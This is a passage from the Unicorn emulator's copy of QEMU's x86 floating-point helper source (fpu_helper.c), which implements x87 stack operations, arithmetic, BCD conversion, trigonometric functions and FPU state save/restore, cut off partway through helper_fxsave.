�����������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/fpu_helper.c���������������������������������������������������������0000664�0000000�0000000�00000122330�14675241067�0020430�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 FPU, MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include <math.h> #include "cpu.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "fpu/softfloat.h" #define FPU_RC_MASK 0xc00 #define FPU_RC_NEAR 0x000 #define FPU_RC_DOWN 0x400 #define FPU_RC_UP 0x800 #define FPU_RC_CHOP 0xc00 #define MAXTAN 9223372036854775808.0 /* the following deal with x86 long double-precision numbers */ #define MAXEXPD 0x7fff #define EXPBIAS 16383 #define EXPD(fp) (fp.l.upper & 0x7fff) #define SIGND(fp) ((fp.l.upper) & 0x8000) #define MANTD(fp) (fp.l.lower) #define BIASEXPONENT(fp) fp.l.upper = (fp.l.upper & ~(0x7fff)) | EXPBIAS #define FPUS_IE (1 << 0) #define FPUS_DE (1 << 1) #define FPUS_ZE (1 << 2) #define FPUS_OE (1 << 3) #define FPUS_UE (1 << 4) #define FPUS_PE (1 << 5) #define FPUS_SF (1 << 6) #define FPUS_SE (1 << 7) #define FPUS_B (1 << 15) #define FPUC_EM 0x3f #define floatx80_lg2 make_floatx80(0x3ffd, 0x9a209a84fbcff799LL) #define floatx80_l2e make_floatx80(0x3fff, 0xb8aa3b295c17f0bcLL) #define floatx80_l2t make_floatx80(0x4000, 0xd49a784bcd1b8afeLL) static void cpu_clear_ignne(CPUX86State *env) { env->hflags2 &= ~HF2_IGNNE_MASK; } void cpu_set_ignne(CPUX86State *env) { env->hflags2 |= HF2_IGNNE_MASK; /* * We get here in response to a write to port F0h. The chipset should * deassert FP_IRQ and FERR# instead should stay signaled until FPSW_SE is * cleared, because FERR# and FP_IRQ are two separate pins on real * hardware. However, we don't model FERR# as a qemu_irq, so we just * do directly what the chipset would do, i.e. deassert FP_IRQ. */ // qemu_irq_lower(ferr_irq); } static inline void fpush(CPUX86State *env) { env->fpstt = (env->fpstt - 1) & 7; env->fptags[env->fpstt] = 0; /* validate stack entry */ } static inline void fpop(CPUX86State *env) { env->fptags[env->fpstt] = 1; /* invalidate stack entry */ env->fpstt = (env->fpstt + 1) & 7; } static inline floatx80 helper_fldt(CPUX86State *env, target_ulong ptr, uintptr_t retaddr) { CPU_LDoubleU temp; temp.l.lower = cpu_ldq_data_ra(env, ptr, retaddr); temp.l.upper = cpu_lduw_data_ra(env, ptr + 8, retaddr); return temp.d; } static inline void helper_fstt(CPUX86State *env, floatx80 f, target_ulong ptr, uintptr_t retaddr) { CPU_LDoubleU temp; temp.d = f; cpu_stq_data_ra(env, ptr, temp.l.lower, retaddr); cpu_stw_data_ra(env, ptr + 8, temp.l.upper, retaddr); } /* x87 FPU helpers */ static inline double floatx80_to_double(CPUX86State *env, floatx80 a) { union { float64 f64; double d; } u; u.f64 = floatx80_to_float64(a, &env->fp_status); return u.d; } static inline floatx80 double_to_floatx80(CPUX86State *env, double a) { union { float64 f64; double d; } u; u.d = a; return float64_to_floatx80(u.f64, &env->fp_status); } static void fpu_set_exception(CPUX86State *env, int mask) { env->fpus |= mask; if (env->fpus & (~env->fpuc & FPUC_EM)) { env->fpus |= FPUS_SE | FPUS_B; } } static inline floatx80 helper_fdiv(CPUX86State *env, floatx80 a, floatx80 b) { if (floatx80_is_zero(b)) { fpu_set_exception(env, FPUS_ZE); } return floatx80_div(a, b, &env->fp_status); } static void fpu_raise_exception(CPUX86State *env, uintptr_t retaddr) { if (env->cr[0] & CR0_NE_MASK) { raise_exception_ra(env, EXCP10_COPR, retaddr); } } void helper_flds_FT0(CPUX86State *env, uint32_t val) { union { float32 f; uint32_t i; } u; u.i = val; FT0 = float32_to_floatx80(u.f, &env->fp_status); } void helper_fldl_FT0(CPUX86State *env, uint64_t val) { union { float64 f; uint64_t i; } u; u.i = val; FT0 = float64_to_floatx80(u.f, &env->fp_status); } void helper_fildl_FT0(CPUX86State *env, int32_t val) { FT0 = int32_to_floatx80(val, &env->fp_status); } void helper_flds_ST0(CPUX86State *env, uint32_t val) { int new_fpstt; union { float32 f; uint32_t i; } u; new_fpstt = (env->fpstt - 1) & 7; u.i = val; env->fpregs[new_fpstt].d = float32_to_floatx80(u.f, &env->fp_status); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } void helper_fldl_ST0(CPUX86State *env, uint64_t val) { int new_fpstt; union { float64 f; uint64_t i; } u; new_fpstt = (env->fpstt - 1) & 7; u.i = val; env->fpregs[new_fpstt].d = float64_to_floatx80(u.f, &env->fp_status); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } void helper_fildl_ST0(CPUX86State *env, int32_t val) { int new_fpstt; new_fpstt = (env->fpstt - 1) & 7; env->fpregs[new_fpstt].d = int32_to_floatx80(val, &env->fp_status); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } void helper_fildll_ST0(CPUX86State *env, int64_t val) { int new_fpstt; new_fpstt = (env->fpstt - 1) & 7; env->fpregs[new_fpstt].d = int64_to_floatx80(val, &env->fp_status); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } uint32_t helper_fsts_ST0(CPUX86State *env) { union { float32 f; uint32_t i; } u; u.f = floatx80_to_float32(ST0, &env->fp_status); return u.i; } uint64_t helper_fstl_ST0(CPUX86State *env) { union { float64 f; uint64_t i; } u; u.f = floatx80_to_float64(ST0, &env->fp_status); return u.i; } int32_t helper_fist_ST0(CPUX86State *env) { int32_t val; val = floatx80_to_int32(ST0, &env->fp_status); if (val != (int16_t)val) { val = -32768; } return val; } int32_t helper_fistl_ST0(CPUX86State *env) { int32_t val; signed char old_exp_flags; old_exp_flags = get_float_exception_flags(&env->fp_status); set_float_exception_flags(0, &env->fp_status); val = floatx80_to_int32(ST0, &env->fp_status); if (get_float_exception_flags(&env->fp_status) & float_flag_invalid) { val = 0x80000000; } set_float_exception_flags(get_float_exception_flags(&env->fp_status) | old_exp_flags, &env->fp_status); return val; } int64_t helper_fistll_ST0(CPUX86State *env) { int64_t val; signed char old_exp_flags; old_exp_flags = get_float_exception_flags(&env->fp_status); set_float_exception_flags(0, &env->fp_status); val = floatx80_to_int64(ST0, &env->fp_status); if (get_float_exception_flags(&env->fp_status) & float_flag_invalid) { val = 0x8000000000000000ULL; } set_float_exception_flags(get_float_exception_flags(&env->fp_status) | old_exp_flags, &env->fp_status); return val; } int32_t helper_fistt_ST0(CPUX86State *env) { int32_t val; val = floatx80_to_int32_round_to_zero(ST0, &env->fp_status); if (val != (int16_t)val) { val = -32768; } return val; } int32_t helper_fisttl_ST0(CPUX86State *env) { return floatx80_to_int32_round_to_zero(ST0, &env->fp_status); } int64_t helper_fisttll_ST0(CPUX86State *env) { return floatx80_to_int64_round_to_zero(ST0, &env->fp_status); } void helper_fldt_ST0(CPUX86State *env, target_ulong ptr) { int new_fpstt; new_fpstt = (env->fpstt - 1) & 7; env->fpregs[new_fpstt].d = helper_fldt(env, ptr, GETPC()); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } void helper_fstt_ST0(CPUX86State *env, target_ulong ptr) { helper_fstt(env, ST0, ptr, GETPC()); } void helper_fpush(CPUX86State *env) { fpush(env); } void helper_fpop(CPUX86State *env) { fpop(env); } void helper_fdecstp(CPUX86State *env) { env->fpstt = (env->fpstt - 1) & 7; env->fpus &= ~0x4700; } void helper_fincstp(CPUX86State *env) { env->fpstt = (env->fpstt + 1) & 7; env->fpus &= ~0x4700; } /* FPU move */ void helper_ffree_STN(CPUX86State *env, int st_index) { env->fptags[(env->fpstt + st_index) & 7] = 1; } void helper_fmov_ST0_FT0(CPUX86State *env) { ST0 = FT0; } void helper_fmov_FT0_STN(CPUX86State *env, int st_index) { FT0 = ST(st_index); } void helper_fmov_ST0_STN(CPUX86State *env, int st_index) { ST0 = ST(st_index); } void helper_fmov_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = ST0; } void helper_fxchg_ST0_STN(CPUX86State *env, int st_index) { floatx80 tmp; tmp = ST(st_index); ST(st_index) = ST0; ST0 = tmp; } /* FPU operations */ static const int fcom_ccval[4] = {0x0100, 0x4000, 0x0000, 0x4500}; void helper_fcom_ST0_FT0(CPUX86State *env) { int ret; ret = floatx80_compare(ST0, FT0, &env->fp_status); env->fpus = (env->fpus & ~0x4500) | fcom_ccval[ret + 1]; } void helper_fucom_ST0_FT0(CPUX86State *env) { int ret; ret = floatx80_compare_quiet(ST0, FT0, &env->fp_status); env->fpus = (env->fpus & ~0x4500) | fcom_ccval[ret + 1]; } static const int fcomi_ccval[4] = {CC_C, CC_Z, 0, CC_Z | CC_P | CC_C}; void helper_fcomi_ST0_FT0(CPUX86State *env) { int eflags; int ret; ret = floatx80_compare(ST0, FT0, &env->fp_status); eflags = cpu_cc_compute_all(env, CC_OP); eflags = (eflags & ~(CC_Z | CC_P | CC_C)) | fcomi_ccval[ret + 1]; CC_SRC = eflags; } void helper_fucomi_ST0_FT0(CPUX86State *env) { int eflags; int ret; ret = floatx80_compare_quiet(ST0, FT0, &env->fp_status); eflags = cpu_cc_compute_all(env, CC_OP); eflags = (eflags & ~(CC_Z | CC_P | CC_C)) | fcomi_ccval[ret + 1]; CC_SRC = eflags; } void helper_fadd_ST0_FT0(CPUX86State *env) { ST0 = floatx80_add(ST0, FT0, &env->fp_status); } void helper_fmul_ST0_FT0(CPUX86State *env) { ST0 = floatx80_mul(ST0, FT0, &env->fp_status); } void helper_fsub_ST0_FT0(CPUX86State *env) { ST0 = floatx80_sub(ST0, FT0, &env->fp_status); } void helper_fsubr_ST0_FT0(CPUX86State *env) { ST0 = floatx80_sub(FT0, ST0, &env->fp_status); } void helper_fdiv_ST0_FT0(CPUX86State *env) { ST0 = helper_fdiv(env, ST0, FT0); } void helper_fdivr_ST0_FT0(CPUX86State *env) { ST0 = helper_fdiv(env, FT0, ST0); } /* fp operations between STN and ST0 */ void helper_fadd_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = floatx80_add(ST(st_index), ST0, &env->fp_status); } void helper_fmul_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = floatx80_mul(ST(st_index), ST0, &env->fp_status); } void helper_fsub_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = floatx80_sub(ST(st_index), ST0, &env->fp_status); } void helper_fsubr_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = floatx80_sub(ST0, ST(st_index), &env->fp_status); } void helper_fdiv_STN_ST0(CPUX86State *env, int st_index) { floatx80 *p; p = &ST(st_index); *p = helper_fdiv(env, *p, ST0); } void helper_fdivr_STN_ST0(CPUX86State *env, int st_index) { floatx80 *p; p = &ST(st_index); *p = helper_fdiv(env, ST0, *p); } /* misc FPU operations */ void helper_fchs_ST0(CPUX86State *env) { ST0 = floatx80_chs(ST0); } void helper_fabs_ST0(CPUX86State *env) { ST0 = floatx80_abs(ST0); } void helper_fld1_ST0(CPUX86State *env) { //ST0 = floatx80_one; floatx80 one = { 0x8000000000000000LL, 0x3fff }; ST0 = one; } void helper_fldl2t_ST0(CPUX86State *env) { //ST0 = floatx80_l2t; floatx80 l2t = { 0xd49a784bcd1b8afeLL, 0x4000 }; ST0 = l2t; } void helper_fldl2e_ST0(CPUX86State *env) { //ST0 = floatx80_l2e; floatx80 l2e = { 0xb8aa3b295c17f0bcLL, 0x3fff }; ST0 = l2e; } void helper_fldpi_ST0(CPUX86State *env) { //ST0 = floatx80_pi; floatx80 pi = { 0xc90fdaa22168c235LL, 0x4000 }; ST0 = pi; } void helper_fldlg2_ST0(CPUX86State *env) { //ST0 = floatx80_lg2; floatx80 lg2 = { 0x9a209a84fbcff799LL, 0x3ffd }; ST0 = lg2; } void helper_fldln2_ST0(CPUX86State *env) { //ST0 = floatx80_ln2; floatx80 ln2 = { 0xb17217f7d1cf79acLL, 0x3ffe }; ST0 = ln2; } void helper_fldz_ST0(CPUX86State *env) { //ST0 = floatx80_zero; floatx80 zero = { 0x0000000000000000LL, 0x0000 }; ST0 = zero; } void helper_fldz_FT0(CPUX86State *env) { //FT0 = floatx80_zero; floatx80 zero = { 0x0000000000000000LL, 0x0000 }; FT0 = zero; } uint32_t helper_fnstsw(CPUX86State *env) { return (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; } uint32_t helper_fnstcw(CPUX86State *env) { return env->fpuc; } void update_fp_status(CPUX86State *env) { int rnd_type; /* set rounding mode */ switch (env->fpuc & FPU_RC_MASK) { default: case FPU_RC_NEAR: rnd_type = float_round_nearest_even; break; case FPU_RC_DOWN: rnd_type = float_round_down; break; case FPU_RC_UP: rnd_type = float_round_up; break; case FPU_RC_CHOP: rnd_type = float_round_to_zero; break; } set_float_rounding_mode(rnd_type, &env->fp_status); switch ((env->fpuc >> 8) & 3) { case 0: rnd_type = 32; break; case 2: rnd_type = 64; break; case 3: default: rnd_type = 80; break; } set_floatx80_rounding_precision(rnd_type, &env->fp_status); } void helper_fldcw(CPUX86State *env, uint32_t val) { cpu_set_fpuc(env, val); } void helper_fclex(CPUX86State *env) { env->fpus &= 0x7f00; } void helper_fwait(CPUX86State *env) { if (env->fpus & FPUS_SE) { fpu_raise_exception(env, GETPC()); } } static void do_fninit(CPUX86State *env) { env->fpus = 0; env->fpstt = 0; env->fpcs = 0; env->fpds = 0; env->fpip = 0; env->fpdp = 0; cpu_set_fpuc(env, 0x37f); env->fptags[0] = 1; env->fptags[1] = 1; env->fptags[2] = 1; env->fptags[3] = 1; env->fptags[4] = 1; env->fptags[5] = 1; env->fptags[6] = 1; env->fptags[7] = 1; } void helper_fninit(CPUX86State *env) { do_fninit(env); } /* BCD ops */ void helper_fbld_ST0(CPUX86State *env, target_ulong ptr) { floatx80 tmp; uint64_t val; unsigned int v; int i; val = 0; for (i = 8; i >= 0; i--) { v = cpu_ldub_data_ra(env, ptr + i, GETPC()); val = (val * 100) + ((v >> 4) * 10) + (v & 0xf); } tmp = int64_to_floatx80(val, &env->fp_status); if (cpu_ldub_data_ra(env, ptr + 9, GETPC()) & 0x80) { tmp = floatx80_chs(tmp); } fpush(env); ST0 = tmp; } void helper_fbst_ST0(CPUX86State *env, target_ulong ptr) { int v; target_ulong mem_ref, mem_end; int64_t val; val = floatx80_to_int64(ST0, &env->fp_status); mem_ref = ptr; mem_end = mem_ref + 9; if (val < 0) { cpu_stb_data_ra(env, mem_end, 0x80, GETPC()); if (val != 0x8000000000000000LL) { val = -val; } } else { cpu_stb_data_ra(env, mem_end, 0x00, GETPC()); } while (mem_ref < mem_end) { if (val == 0) { break; } v = val % 100; val = val / 100; v = (int)((unsigned int)(v / 10) << 4) | (v % 10); cpu_stb_data_ra(env, mem_ref++, v, GETPC()); } while (mem_ref < mem_end) { cpu_stb_data_ra(env, mem_ref++, 0, GETPC()); } } void helper_f2xm1(CPUX86State *env) { double val = floatx80_to_double(env, ST0); val = pow(2.0, val) - 1.0; ST0 = double_to_floatx80(env, val); } void helper_fyl2x(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if (fptemp > 0.0) { fptemp = log(fptemp) / log(2.0); /* log2(ST) */ fptemp *= floatx80_to_double(env, ST1); ST1 = double_to_floatx80(env, fptemp); fpop(env); } else { env->fpus &= ~0x4700; env->fpus |= 0x400; } } void helper_fptan(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { env->fpus |= 0x400; } else { floatx80 one = { 0x8000000000000000LL, 0x3fff }; fptemp = tan(fptemp); ST0 = double_to_floatx80(env, fptemp); fpush(env); ST0 = one; env->fpus &= ~0x400; /* C2 <-- 0 */ /* the above code is for |arg| < 2**52 only */ } } void helper_fpatan(CPUX86State *env) { double fptemp, fpsrcop; fpsrcop = floatx80_to_double(env, ST1); fptemp = floatx80_to_double(env, ST0); ST1 = double_to_floatx80(env, atan2(fpsrcop, fptemp)); fpop(env); } void helper_fxtract(CPUX86State *env) { CPU_LDoubleU temp; temp.d = ST0; if (floatx80_is_zero(ST0)) { /* Easy way to generate -inf and raising division by 0 exception */ floatx80 zero = { 0x0000000000000000LL, 0x0000 }; floatx80 one = { 0x8000000000000000LL, 0x3fff }; ST0 = floatx80_div(floatx80_chs(one), zero, &env->fp_status); fpush(env); ST0 = temp.d; } else { int expdif; expdif = EXPD(temp) - EXPBIAS; /* DP exponent bias */ ST0 = int32_to_floatx80(expdif, &env->fp_status); fpush(env); BIASEXPONENT(temp); ST0 = temp.d; } } void helper_fprem1(CPUX86State *env) { double st0, st1, dblq, fpsrcop, fptemp; CPU_LDoubleU fpsrcop1, fptemp1; int expdif; signed long long int q; st0 = floatx80_to_double(env, ST0); st1 = floatx80_to_double(env, ST1); if (isinf(st0) || isnan(st0) || isnan(st1) || (st1 == 0.0)) { ST0 = double_to_floatx80(env, NAN); /* NaN */ env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ return; } fpsrcop = st0; fptemp = st1; fpsrcop1.d = ST0; fptemp1.d = ST1; expdif = EXPD(fpsrcop1) - EXPD(fptemp1); if (expdif < 0) { /* optimisation? taken from the AMD docs */ env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ /* ST0 is unchanged */ return; } if (expdif < 53) { dblq = fpsrcop / fptemp; /* round dblq towards nearest integer */ dblq = rint(dblq); st0 = fpsrcop - fptemp * dblq; /* convert dblq to q by truncating towards zero */ if (dblq < 0.0) { q = (signed long long int)(-dblq); } else { q = (signed long long int)dblq; } env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ /* (C0,C3,C1) <-- (q2,q1,q0) */ env->fpus |= (q & 0x4) << (8 - 2); /* (C0) <-- q2 */ env->fpus |= (q & 0x2) << (14 - 1); /* (C3) <-- q1 */ env->fpus |= (q & 0x1) << (9 - 0); /* (C1) <-- q0 */ } else { env->fpus |= 0x400; /* C2 <-- 1 */ fptemp = pow(2.0, expdif - 50); fpsrcop = (st0 / st1) / fptemp; /* fpsrcop = integer obtained by chopping */ fpsrcop = (fpsrcop < 0.0) ? -(floor(fabs(fpsrcop))) : floor(fpsrcop); st0 -= (st1 * fpsrcop * fptemp); } ST0 = double_to_floatx80(env, st0); } void helper_fprem(CPUX86State *env) { double st0, st1, dblq, fpsrcop, fptemp; CPU_LDoubleU fpsrcop1, fptemp1; int expdif; signed long long int q; st0 = floatx80_to_double(env, ST0); st1 = floatx80_to_double(env, ST1); if (isinf(st0) || isnan(st0) || isnan(st1) || (st1 == 0.0)) { ST0 = double_to_floatx80(env, NAN); /* NaN */ env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ return; } fpsrcop = st0; fptemp = st1; fpsrcop1.d = ST0; fptemp1.d = ST1; expdif = EXPD(fpsrcop1) - EXPD(fptemp1); if (expdif < 0) { /* optimisation? taken from the AMD docs */ env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ /* ST0 is unchanged */ return; } if (expdif < 53) { dblq = fpsrcop / fptemp; /* ST0 / ST1 */ /* round dblq towards zero */ dblq = (dblq < 0.0) ? ceil(dblq) : floor(dblq); st0 = fpsrcop - fptemp * dblq; /* fpsrcop is ST0 */ /* convert dblq to q by truncating towards zero */ if (dblq < 0.0) { q = (signed long long int)(-dblq); } else { q = (signed long long int)dblq; } env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ /* (C0,C3,C1) <-- (q2,q1,q0) */ env->fpus |= (q & 0x4) << (8 - 2); /* (C0) <-- q2 */ env->fpus |= (q & 0x2) << (14 - 1); /* (C3) <-- q1 */ env->fpus |= (q & 0x1) << (9 - 0); /* (C1) <-- q0 */ } else { int N = 32 + (expdif % 32); /* as per AMD docs */ env->fpus |= 0x400; /* C2 <-- 1 */ fptemp = pow(2.0, (double)(expdif - N)); fpsrcop = (st0 / st1) / fptemp; /* fpsrcop = integer obtained by chopping */ fpsrcop = (fpsrcop < 0.0) ? -(floor(fabs(fpsrcop))) : floor(fpsrcop); st0 -= (st1 * fpsrcop * fptemp); } ST0 = double_to_floatx80(env, st0); } void helper_fyl2xp1(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp + 1.0) > 0.0) { fptemp = log(fptemp + 1.0) / log(2.0); /* log2(ST + 1.0) */ fptemp *= floatx80_to_double(env, ST1); ST1 = double_to_floatx80(env, fptemp); fpop(env); } else { env->fpus &= ~0x4700; env->fpus |= 0x400; } } void helper_fsqrt(CPUX86State *env) { if (floatx80_is_neg(ST0)) { env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ env->fpus |= 0x400; } ST0 = floatx80_sqrt(ST0, &env->fp_status); } void helper_fsincos(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { env->fpus |= 0x400; } else { ST0 = double_to_floatx80(env, sin(fptemp)); fpush(env); ST0 = double_to_floatx80(env, cos(fptemp)); env->fpus &= ~0x400; /* C2 <-- 0 */ /* the above code is for |arg| < 2**63 only */ } } void helper_frndint(CPUX86State *env) { ST0 = floatx80_round_to_int(ST0, &env->fp_status); } void helper_fscale(CPUX86State *env) { if (floatx80_is_any_nan(ST1)) { ST0 = ST1; } else { int n = floatx80_to_int32_round_to_zero(ST1, &env->fp_status); ST0 = floatx80_scalbn(ST0, n, &env->fp_status); } } void helper_fsin(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { env->fpus |= 0x400; } else { ST0 = double_to_floatx80(env, sin(fptemp)); env->fpus &= ~0x400; /* C2 <-- 0 */ /* the above code is for |arg| < 2**53 only */ } } void helper_fcos(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { env->fpus |= 0x400; } else { ST0 = double_to_floatx80(env, cos(fptemp)); env->fpus &= ~0x400; /* C2 <-- 0 */ /* the above code is for |arg| < 2**63 only */ } } void helper_fxam_ST0(CPUX86State *env) { CPU_LDoubleU temp; int expdif; temp.d = ST0; env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ if (SIGND(temp)) { env->fpus |= 0x200; /* C1 <-- 1 */ } if (env->fptags[env->fpstt]) { env->fpus |= 0x4100; /* Empty */ return; } expdif = EXPD(temp); if (expdif == MAXEXPD) { if (MANTD(temp) == 0x8000000000000000ULL) { env->fpus |= 0x500; /* Infinity */ } else { env->fpus |= 0x100; /* NaN */ } } else if (expdif == 0) { if (MANTD(temp) == 0) { env->fpus |= 0x4000; /* Zero */ } else { env->fpus |= 0x4400; /* Denormal */ } } else { env->fpus |= 0x400; } } static void do_fstenv(CPUX86State *env, target_ulong ptr, int data32, uintptr_t retaddr) { int fpus, fptag, exp, i; uint64_t mant; CPU_LDoubleU tmp; fpus = (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; fptag = 0; for (i = 7; i >= 0; i--) { fptag <<= 2; if (env->fptags[i]) { fptag |= 3; } else { tmp.d = env->fpregs[i].d; exp = EXPD(tmp); mant = MANTD(tmp); if (exp == 0 && mant == 0) { /* zero */ fptag |= 1; } else if (exp == 0 || exp == MAXEXPD || (mant & (1ULL << 63)) == 0) { /* NaNs, infinity, denormal */ fptag |= 2; } } } if (data32) { /* 32 bit */ cpu_stl_data_ra(env, ptr, env->fpuc, retaddr); cpu_stl_data_ra(env, ptr + 4, fpus, retaddr); cpu_stl_data_ra(env, ptr + 8, fptag, retaddr); cpu_stl_data_ra(env, ptr + 12, env->fpip, retaddr); /* fpip */ cpu_stl_data_ra(env, ptr + 16, env->fpcs, retaddr); /* fpcs */ cpu_stl_data_ra(env, ptr + 20, env->fpdp, retaddr); /* fpoo */ cpu_stl_data_ra(env, ptr + 24, env->fpds, retaddr); /* fpos */ } else { /* 16 bit */ cpu_stw_data_ra(env, ptr, env->fpuc, retaddr); cpu_stw_data_ra(env, ptr + 2, fpus, retaddr); cpu_stw_data_ra(env, ptr + 4, fptag, retaddr); cpu_stw_data_ra(env, ptr + 6, env->fpip, retaddr); cpu_stw_data_ra(env, ptr + 8, env->fpcs, retaddr); cpu_stw_data_ra(env, ptr + 10, env->fpdp, retaddr); cpu_stw_data_ra(env, ptr + 12, env->fpds, retaddr); } } void helper_fstenv(CPUX86State *env, target_ulong ptr, int data32) { do_fstenv(env, ptr, data32, GETPC()); } static void cpu_set_fpus(CPUX86State *env, uint16_t fpus) { env->fpstt = (fpus >> 11) & 7; env->fpus = fpus & ~0x3800 & ~FPUS_B; env->fpus |= env->fpus & FPUS_SE ? FPUS_B : 0; if (!(env->fpus & FPUS_SE)) { /* * Here the processor deasserts FERR#; in response, the chipset deasserts * IGNNE#. */ cpu_clear_ignne(env); } } static void do_fldenv(CPUX86State *env, target_ulong ptr, int data32, uintptr_t retaddr) { int i, fpus, fptag; if (data32) { cpu_set_fpuc(env, cpu_lduw_data_ra(env, ptr, retaddr)); fpus = cpu_lduw_data_ra(env, ptr + 4, retaddr); fptag = cpu_lduw_data_ra(env, ptr + 8, retaddr); } else { cpu_set_fpuc(env, cpu_lduw_data_ra(env, ptr, retaddr)); fpus = cpu_lduw_data_ra(env, ptr + 2, retaddr); fptag = cpu_lduw_data_ra(env, ptr + 4, retaddr); } cpu_set_fpus(env, fpus); for (i = 0; i < 8; i++) { env->fptags[i] = ((fptag & 3) == 3); fptag >>= 2; } } void helper_fldenv(CPUX86State *env, target_ulong ptr, int data32) { do_fldenv(env, ptr, data32, GETPC()); } void helper_fsave(CPUX86State *env, target_ulong ptr, int data32) { floatx80 tmp; int i; do_fstenv(env, ptr, data32, GETPC()); ptr += (14 << data32); for (i = 0; i < 8; i++) { tmp = ST(i); helper_fstt(env, tmp, ptr, GETPC()); ptr += 10; } do_fninit(env); } void helper_frstor(CPUX86State *env, target_ulong ptr, int data32) { floatx80 tmp; int i; do_fldenv(env, ptr, data32, GETPC()); ptr += (14 << data32); for (i = 0; i < 8; i++) { tmp = helper_fldt(env, ptr, GETPC()); ST(i) = tmp; ptr += 10; } } #define XO(X) offsetof(X86XSaveArea, X) static void do_xsave_fpu(CPUX86State *env, target_ulong ptr, uintptr_t ra) { int fpus, fptag, i; target_ulong addr; fpus = (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; fptag = 0; for (i = 0; i < 8; i++) { fptag |= (env->fptags[i] << i); } cpu_stw_data_ra(env, ptr + XO(legacy.fcw), env->fpuc, ra); cpu_stw_data_ra(env, ptr + XO(legacy.fsw), fpus, ra); cpu_stw_data_ra(env, ptr + XO(legacy.ftw), fptag ^ 0xff, ra); /* In 32-bit mode this is eip, sel, dp, sel. In 64-bit mode this is rip, rdp. But in either case we don't write actual data, just zeros. */ cpu_stq_data_ra(env, ptr + XO(legacy.fpip), env->fpip, ra); /* eip+sel; rip */ cpu_stq_data_ra(env, ptr + XO(legacy.fpdp), 0, ra); /* edp+sel; rdp */ addr = ptr + XO(legacy.fpregs); for (i = 0; i < 8; i++) { floatx80 tmp = ST(i); helper_fstt(env, tmp, addr, ra); addr += 16; } } static void do_xsave_mxcsr(CPUX86State *env, target_ulong ptr, uintptr_t ra) { cpu_stl_data_ra(env, ptr + XO(legacy.mxcsr), env->mxcsr, ra); cpu_stl_data_ra(env, ptr + XO(legacy.mxcsr_mask), 0x0000ffff, ra); } static void do_xsave_sse(CPUX86State *env, target_ulong ptr, uintptr_t ra) { int i, nb_xmm_regs; target_ulong addr; if (env->hflags & HF_CS64_MASK) { nb_xmm_regs = 16; } else { nb_xmm_regs = 8; } addr = ptr + XO(legacy.xmm_regs); for (i = 0; i < nb_xmm_regs; i++) { cpu_stq_data_ra(env, addr, env->xmm_regs[i].ZMM_Q(0), ra); cpu_stq_data_ra(env, addr + 8, env->xmm_regs[i].ZMM_Q(1), ra); addr += 16; } } static void do_xsave_bndregs(CPUX86State *env, target_ulong ptr, uintptr_t ra) { target_ulong addr = ptr + offsetof(XSaveBNDREG, bnd_regs); int i; for (i = 0; i < 4; i++, addr += 16) { cpu_stq_data_ra(env, addr, env->bnd_regs[i].lb, ra); cpu_stq_data_ra(env, addr + 8, env->bnd_regs[i].ub, ra); } } static void do_xsave_bndcsr(CPUX86State *env, target_ulong ptr, uintptr_t ra) { cpu_stq_data_ra(env, ptr + offsetof(XSaveBNDCSR, bndcsr.cfgu), env->bndcs_regs.cfgu, ra); cpu_stq_data_ra(env, ptr + offsetof(XSaveBNDCSR, bndcsr.sts), env->bndcs_regs.sts, ra); } static void do_xsave_pkru(CPUX86State *env, target_ulong ptr, uintptr_t ra) { cpu_stq_data_ra(env, ptr, env->pkru, ra); } void helper_fxsave(CPUX86State *env, target_ulong ptr) { uintptr_t ra = GETPC(); /* The operand must be 16 byte aligned */ if (ptr & 0xf) { raise_exception_ra(env, EXCP0D_GPF, ra); } do_xsave_fpu(env, ptr, ra); if (env->cr[4] & CR4_OSFXSR_MASK) { 